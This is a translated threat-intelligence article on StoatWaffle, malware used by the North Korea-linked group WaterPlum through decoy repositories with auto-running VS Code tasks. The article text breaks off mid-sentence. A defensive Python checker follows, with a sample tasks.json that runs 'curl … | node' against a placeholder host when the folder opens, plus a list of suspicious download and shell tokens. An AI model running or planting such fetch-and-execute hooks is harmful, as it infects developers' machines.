StoatWaffle, malware used by WaterPlum
This article is the English version of "WaterPlumが使用するマルウェアStoatWaffleについて", translated by Ryu Hiyoshi, NSJ SOC analyst.
The original article is authored by NSJ SOC analyst Rintaro Koike.
Introduction
WaterPlum is regarded as an attack group linked to North Korea. It is known to operate the Contagious Interview campaign. WaterPlum can be divided into multiple clusters (or teams); among them, activity by Team 8 (also known as the Moralis or Modilus family) has been observed.
In the Contagious Interview campaign, Team 8 has mainly used OtterCookie. Starting around December 2025, Team 8 began using new malware, which we named StoatWaffle.
In this article, we introduce the latest attack flow used by WaterPlum Team 8 and the results of our in-depth analysis of StoatWaffle, the new malware they recently started using.
Attack Flow
Team 8 uses a blockchain-related project as a decoy. This malicious repository contains a .vscode directory holding a tasks.json file. If a user opens and trusts this …
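As an added defensive example (not code from the original article), the following Python checks a repository's .vscode/tasks.json for tasks configured to start automatically once the folder is opened in a trusted workspace. It assumes the abuse relies on VS Code's runOptions.runOn = "folderOpen" setting; the tasks.json shown is constructed for illustration and is not the campaign's file.

```python
import json

# Constructed sample of a .vscode/tasks.json that abuses the auto-run
# feature. This is NOT the file from the campaign; the URL is a placeholder.
SAMPLE_TASKS_JSON = """
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build"
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s http://EXAMPLE-PLACEHOLDER/x | node",
      "runOptions": {"runOn": "folderOpen"}
    }
  ]
}
"""

# Tokens that are unusual in a build task and worth a human look.
SUSPICIOUS_TOKENS = (
    "curl ", "wget ", "| node", "| sh", "| bash", "powershell", "Invoke-", "http://",
)


def find_autorun_tasks(tasks_json: str) -> list[dict]:
    """Return the tasks VS Code would start on its own when the folder is
    opened in a trusted workspace (runOptions.runOn == "folderOpen").

    Note: real tasks.json files may contain comments (JSONC); json.loads
    rejects those, so a JSONC-tolerant parser is needed for such inputs."""
    doc = json.loads(tasks_json)
    found = []
    for task in doc.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on != "folderOpen":
            continue
        # Flatten command and args into one string for inspection.
        parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        cmd = " ".join(parts)
        hits = [t for t in SUSPICIOUS_TOKENS if t in cmd]
        found.append({"label": task.get("label"), "command": cmd, "indicators": hits})
    return found
```

Run it against every .vscode/tasks.json in a cloned repository before opening it in the editor, and treat any returned task with non-empty indicators as a reason not to trust the workspace.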
IoC